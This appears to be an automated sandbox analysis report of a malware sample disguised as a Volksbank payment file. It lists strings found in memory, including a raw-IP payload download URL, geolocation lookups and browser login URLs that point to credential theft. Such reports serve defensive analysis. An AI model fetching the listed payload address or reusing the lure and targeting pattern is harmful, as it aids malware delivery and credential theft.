"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povare
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810121195.0000000034E20000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810121195.0000000034E20000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://102.165.14.28/dYaWuYrfJW197.bin
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://c.pki.goog/r/r1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://c.pki.goog/wr2/9UVbN0w5E6Y.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://certificates.godaddy.com/repository/0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://certs.godaddy.com/repository/1301
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://contentstorage.osi.office.net/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3234667457.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.2976678196.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7800247694.00000000041B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp?
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpb9
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpgramFi
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://i.pki.goog/r1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://i.pki.goog/wr2.crt0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://o.pki.goog/wr20%
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://o.ss2.us/0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0:
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0B
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0F
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0G
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0H
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0I
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0K
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0M
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.godaddy.com/0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.godaddy.com/02
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.godaddy.com/05
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.msocsp.com0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.sectigo.com0%
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocspx.digicert.com0E
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://s.ss2.us/r.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://status.geotrust.com0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://status.thawte.com09
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0u
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0v
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0~
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980743689.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980692782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980917475.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/pn_
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980743689.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980692782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://x.ss2.us/x.cer0&
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3003974432.00000000023BD000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005763130.00000000023BD000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5Q
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRi
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_Gray_X-qkgtg8KmnQEvm_9mDTcw2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/favicon.ico
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&conn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/accountcorepackage_hSxsZy9Ymkhjr2rMMwej_g2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapcomponentshim_yGKy8jAx8RL2bLqmBF063w2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapshim_IX6xrWCoGcREOsbbsQ1Yvg2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/confirmidentity_9m6e3jBPkyZiRdJxglsYsA2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/corewin10_Lmno_4TyJLm7Xee3gF3aOg2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZE
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
